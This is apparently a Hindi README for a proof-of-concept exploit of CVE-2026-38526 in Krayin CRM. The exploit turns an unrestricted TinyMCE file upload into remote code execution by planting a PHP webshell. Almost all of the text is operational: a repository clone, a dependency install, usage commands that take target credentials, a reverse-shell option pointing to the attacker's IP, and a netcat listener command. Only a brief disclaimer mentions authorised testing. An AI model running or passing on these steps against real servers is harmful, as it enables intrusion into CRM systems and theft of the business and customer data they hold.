
CVE-2026-38526 का प्रूफ ऑफ कॉन्सेप्ट Krayin CRM v2.2.x और उससे निचले संस्करणों में। मनमाना फ़ाइल अपलोड जो रिमोट कोड एक्ज़ीक्यूशन तक ले जाता है।
Krayin CRM (≤ 2.2.x) - असीमित फ़ाइल अपलोड जो रिमोट कोड निष्पादन की ओर ले जाता है।
यह PoC कमजोर TinyMCE अपलोड एंडपॉइंट (/admin/tinymce/upload) का शोषण करके एक PHP वेबशेल अपलोड करता है और सर्वर पर कमांड निष्पादन प्राप्त करता है।
git clone https://github.com/pawpic/CVE-2026-38526-POC
pip3 install requests beautifulsoup4
उपयोग
python3 exploit.py \
-u http://example.com \
-e [email protected] \
-p "example_pass" \
--lhost YOUR_IP \
--lport 4444
python3 exploit.py \
-u http://example.com \
-e [email protected] \
-p "example_pass" \
-c "whoami"
| Argument | विवरण | आवश्यक |
|---|---|---|
| -u, --url | लक्ष्य आधार URL | हाँ |
| -e, --email | लॉगिन ईमेल | हाँ |
| -p, --password | लॉगिन पासवर्ड | हाँ |
| -c, --cmd | एकल कमांड निष्पादित करें | नहीं |
| --lhost | रिवर्स शेल के लिए आपका IP | हाँ (यदि --cmd का उपयोग नहीं कर रहे हैं) |
| --lport | लिसनिंग पोर्ट | नहीं (डिफ़ॉल्ट: 4444) |
लिसनर शुरू करें:
nc -lvnp 4444
शोषण चलाएँ:
python3 exploit.py -u http://target.com -e [email protected] -p password --lhost IP_ADDR
यह शोषण केवल शैक्षिक उद्देश्यों और अधिकृत पैठ परीक्षण के लिए है। उन सिस्टमों के खिलाफ अनधिकृत उपयोग जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है, अवैध है।
प्रभावित संस्करण
Krayin CRM ≤ 2.2.x CVE: CVE-2026-38526
लेखक: pawpic दिनांक: 2026